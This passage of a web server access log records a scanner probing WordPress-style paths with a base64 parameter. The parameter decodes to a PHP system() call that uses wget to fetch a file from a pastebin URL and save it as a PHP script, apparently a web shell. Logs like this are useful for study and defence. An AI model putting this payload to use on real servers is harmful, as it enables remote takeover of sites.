/wp-admin/wp-admin.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs= HTTP/1.1" 404 301 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:43:41 +0200] "GET /wp-content/wp-content.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs= HTTP/1.1" 404 302 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:43:48 +0200] "GET /nc_assets/img/featured/600/600.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs= HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:43:54 +0200] "GET /cgi-bin/cgi-bin.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs= HTTP/1.1" 404 301 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:44:03 +0200] "GET /wp-includes/wp-includes.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs= HTTP/1.1" 404 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:44:05 +0200] "GET /.well-known/slicemap.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs= HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:44:08 +0200] "GET /wp-slicemap.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs= HTTP/1.1" 404 302 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:44:13 +0200] "GET /blog/wp-admin/css/colors/blue/blue.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs= HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:44:17 +0200] "GET /wp-includes/SimplePie/SimplePie.php?ebd=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs= HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:44:21 +0200] "GET /wp-content/plugins/widgets/blog.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:44:25 +0200] "GET /blog/wp-admin/css/colors/blue/blue.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs= HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:44:32 +0200] "GET /blog/wp-admin/css/colors/blue/blue.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs= HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 94.102.61.10 - - [30/May/2023:00:50:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" 66.249.69.145 - - [30/May/2023:01:01:35 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 185.224.128.219 - - [30/May/2023:01:20:39 +0200] "GET //admin/config.php HTTP/1.1" 404 289 "-" "python-requests/2.22.0" 62.99.54.211 - - [30/May/2023:01:27:43 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"